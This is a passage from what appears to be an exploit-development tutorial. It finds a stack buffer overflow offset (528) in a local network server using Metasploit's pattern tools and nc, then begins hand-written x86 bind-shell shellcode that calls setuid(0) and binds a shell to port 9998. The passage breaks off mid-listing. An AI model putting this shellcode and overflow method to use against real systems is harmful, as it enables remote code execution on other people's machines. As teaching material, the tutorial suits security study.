h2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk/span/span span class="code-line"span class="gp"testuser@dev:/usr/share/metasploit-framework/tools$ /spanspan class="nb"echo/span -n span class="s2"quot;Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gkquot;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x41367241 in ?? ()/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:/usr/share/metasploit-framework/tools$ /span./pattern_offset.rb span class="m"41367241/span/span span class="code-line"span class="go"[*] Exact match at offset 528/span/span span class="code-line"/code/pre/div /td/tr/table pGreat! So both methods agree. :-)/p h2Developing The Exploit/h2 pSo now to start developing the exploit, which brings us to our second major difference when attacking a remote application./p pIn parts 1 and 2 we put our a href="https://en.wikipedia.org/wiki/Shellcode" target="_blank"shellcode/a inside an environment variable but with a network application we don't have that ability so the shellcode has to be sent to the server some other way. The most obvious way is to send it with our exploit payload which is what we will do here./p pThis also brings up another important feature of shellcode development, our payload is being put through 'strncpy' which means if it contains any null bytes '\x00' then it will cut our shellcode short and ultimately break the exploit. The shellcode I wrote and used in the first 2 parts had no null bytes but this wasn't necessary because we were storing it in a variable but as we can't do that now it is important that there are no null's./p pThe third major difference is obviously the shellcode, the pervious shellcode just launched a shell, that would be useless here because we need a way to connect to the shell so we have to also create a network socket and either bind to a port so we can connect to it or connect out to another machine./p pI've chosen to write a TCP bindshell for this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span class="normal" 17/span/span span class="code-line"span class="normal" 18/span/span span class="code-line"span class="normal" 19/span/span span class="code-line"span class="normal" 20/span/span span class="code-line"span class="normal" 21/span/span span class="code-line"span class="normal" 22/span/span span class="code-line"span class="normal" 23/span/span span class="code-line"span class="normal" 24/span/span span class="code-line"span class="normal" 25/span/span span class="code-line"span class="normal" 26/span/span span class="code-line"span class="normal" 27/span/span span class="code-line"span class="normal" 28/span/span span class="code-line"span class="normal" 29/span/span span class="code-line"span class="normal" 30/span/span span class="code-line"span class="normal" 31/span/span span class="code-line"span class="normal" 32/span/span span class="code-line"span class="normal" 33/span/span span class="code-line"span class="normal" 34/span/span span class="code-line"span class="normal" 35/span/span span class="code-line"span class="normal" 36/span/span span class="code-line"span class="normal" 37/span/span span class="code-line"span class="normal" 38/span/span span class="code-line"span class="normal" 39/span/span span class="code-line"span class="normal" 40/span/span span class="code-line"span class="normal" 41/span/span span class="code-line"span class="normal" 42/span/span span class="code-line"span class="normal" 43/span/span span class="code-line"span class="normal" 44/span/span span class="code-line"span class="normal" 45/span/span span class="code-line"span class="normal" 46/span/span span class="code-line"span class="normal" 47/span/span span class="code-line"span class="normal" 48/span/span span class="code-line"span class="normal" 49/span/span span class="code-line"span class="normal" 50/span/span span class="code-line"span class="normal" 51/span/span span class="code-line"span class="normal" 52/span/span span class="code-line"span class="normal" 53/span/span span class="code-line"span class="normal" 54/span/span span class="code-line"span class="normal" 55/span/span span class="code-line"span class="normal" 56/span/span span class="code-line"span class="normal" 57/span/span span class="code-line"span class="normal" 58/span/span span class="code-line"span class="normal" 59/span/span span class="code-line"span class="normal" 60/span/span span class="code-line"span class="normal" 61/span/span span class="code-line"span class="normal" 62/span/span span class="code-line"span class="normal" 63/span/span span class="code-line"span class="normal" 64/span/span span class="code-line"span class="normal" 65/span/span span class="code-line"span class="normal" 66/span/span span class="code-line"span class="normal" 67/span/span span class="code-line"span class="normal" 68/span/span span class="code-line"span class="normal" 69/span/span span class="code-line"span class="normal" 70/span/span span class="code-line"span class="normal" 71/span/span span class="code-line"span class="normal" 72/span/span span class="code-line"span class="normal" 73/span/span span class="code-line"span class="normal" 74/span/span span class="code-line"span class="normal" 75/span/span span class="code-line"span class="normal" 76/span/span span class="code-line"span class="normal" 77/span/span span class="code-line"span class="normal" 78/span/span span class="code-line"span class="normal" 79/span/span span class="code-line"span class="normal" 80/span/span span class="code-line"span class="normal" 81/span/span span class="code-line"span class="normal" 82/span/span span class="code-line"span class="normal" 83/span/span span class="code-line"span class="normal" 84/span/span span class="code-line"span class="normal" 85/span/span span class="code-line"span class="normal" 86/span/span span class="code-line"span class="normal" 87/span/span span class="code-line"span class="normal" 88/span/span span class="code-line"span class="normal" 89/span/span span class="code-line"span class="normal" 90/span/span span class="code-line"span class="normal" 91/span/span span class="code-line"span class="normal" 92/span/span span class="code-line"span class="normal" 93/span/span span class="code-line"span class="normal" 94/span/span span class="code-line"span class="normal" 95/span/span span class="code-line"span class="normal" 96/span/span span class="code-line"span class="normal" 97/span/span span class="code-line"span class="normal" 98/span/span span class="code-line"span class="normal" 99/span/span span class="code-line"span class="normal"100/span/span span class="code-line"span class="normal"101/span/span span class="code-line"span class="normal"102/span/span span class="code-line"span class="normal"103/span/span span class="code-line"span class="normal"104/span/span span class="code-line"span class="normal"105/span/span span class="code-line"span class="normal"106/span/span span class="code-line"span class="normal"107/span/span span class="code-line"span class="normal"108/span/span span class="code-line"span class="normal"109/span/span span class="code-line"span class="normal"110/span/span span class="code-line"span class="normal"111/span/span span class="code-line"span class="normal"112/span/span span class="code-line"span class="normal"113/span/span span class="code-line"span class="normal"114/span/span span class="code-line"span class="normal"115/span/span span class="code-line"span class="normal"116/span/span span class="code-line"span class="normal"117/span/span span class="code-line"span class="normal"118/span/span span class="code-line"span class="normal"119/span/span span class="code-line"span class="normal"120/span/span span class="code-line"span class="normal"121/span/span span class="code-line"span class="normal"122/span/span span class="code-line"span class="normal"123/span/span span class="code-line"span class="normal"124/span/span span class="code-line"span class="normal"125/span/span span class="code-line"span class="normal"126/span/span span class="code-line"span class="normal"127/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="c1"; set up a socket listening on port 9998/spanspan class="w"/span/span span class="code-line"span class="c1"; once we receive a connection duplicate/spanspan class="w"/span/span span class="code-line"span class="c1"; stdin, stdout and stderr to run over that/spanspan class="w"/span/span span class="code-line"span class="c1"; client socket and execute execve with/spanspan class="w"/span/span span class="code-line"span class="c1"; /bin/bash/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"global/spanspan class="w" /spanspan class="nv"_start/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"section/spanspan class="w" /spanspan class="nv".text/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="nl"_start:/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"eax/spanspan class="p",/spanspan class="w" /spanspan class="nb"eax/spanspan class="w" /spanspan class="c1"; zero out all the registers/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"ebx/spanspan class="p",/spanspan class="w" /spanspan class="nb"ebx/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="nb"ecx/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"edx/spanspan class="p",/spanspan class="w" /spanspan class="nb"edx/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"al/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x17/spanspan class="w" /spanspan class="c1"; put 23 into eax to setuid/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"ebx/spanspan class="p",/spanspan class="w" /spanspan class="nb"ebx/spanspan class="w" /spanspan class="c1"; zero out ebx/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="mh"0x80/spanspan class="w" /spanspan class="c1"; make the syscall setuid/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"eax/spanspan class="p",/spanspan class="w" /spanspan class="nb"ebx/spanspan class="w" /spanspan class="c1"; zero out eax again/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"al/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x66/spanspan class="w" /spanspan class="c1"; put the sys call number 102 into eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"bl/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x1/spanspan class="w" /spanspan class="c1"; select SOCKET to create a new socket/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"ecx/spanspan class="w" /spanspan class="c1"; push the arguments onto the stack in/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; reverse order and null terminate/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="mh"0x1/spanspan class="w" /spanspan class="c1"; SOCK_STREAM/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="mh"0x2/spanspan class="w" /spanspan class="c1"; AF_INET/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="nb"esp/spanspan class="w" /spanspan class="c1"; move the address of the arguments/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; into ecx/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="mh"0x80/spanspan class="w" /spanspan class="c1"; execute the syscall socketcall SOCKET/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"esi/spanspan class="p",/spanspan class="w" /spanspan class="nb"eax/spanspan class="w" /spanspan class="c1"; move the descriptor returned into/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; esi for use later/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"al/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x66/spanspan class="w" /spanspan class="c1"; put the sys call number 102 into eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"bl/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x2/spanspan class="w" /spanspan class="c1"; select BIND to bind to a port/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"edx/spanspan class="w" /spanspan class="c1"; push the struct sockaddr onto the stack in/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; reverse order and null terminate/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="kt"WORD/spanspan class="w" /spanspan class="mh"0x0e27/spanspan class="w" /spanspan class="c1"; port 9998/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"bx/spanspan class="w" /spanspan class="c1"; AF_INET/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="nb"esp/spanspan class="w" /spanspan class="c1"; move the address of the struct sockaddr/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; into ecx/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="mh"0x10/spanspan class="w" /spanspan class="c1"; socklen_t argument (16)/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"ecx/spanspan class="w" /spanspan class="c1"; struct sockaddr/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"esi/spanspan class="w" /spanspan class="c1"; descriptor returned by the call to socket/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="nb"esp/spanspan class="w" /spanspan class="c1"; move the address of the arguments/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; into ecx/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="mh"0x80/spanspan class="w" /spanspan class="c1"; execute the syscall socketcall BIND/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"al/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x66/spanspan class="w" /spanspan class="c1"; put the sys call number 102 into eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"bl/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x4/spanspan class="w" /spanspan class="c1"; select LISTEN/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="mh"0x1/spanspan class="w" /spanspan class="c1"; push arguments to bind onto the stack/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; in reverse/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"esi/spanspan class="w" /spanspan class="c1"; push descriptor returned by call to socket/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="nb"esp/spanspan class="w" /spanspan class="c1"; move the address of the arguments/spanspan class="w"/span/span span class="code-line"span class="w" 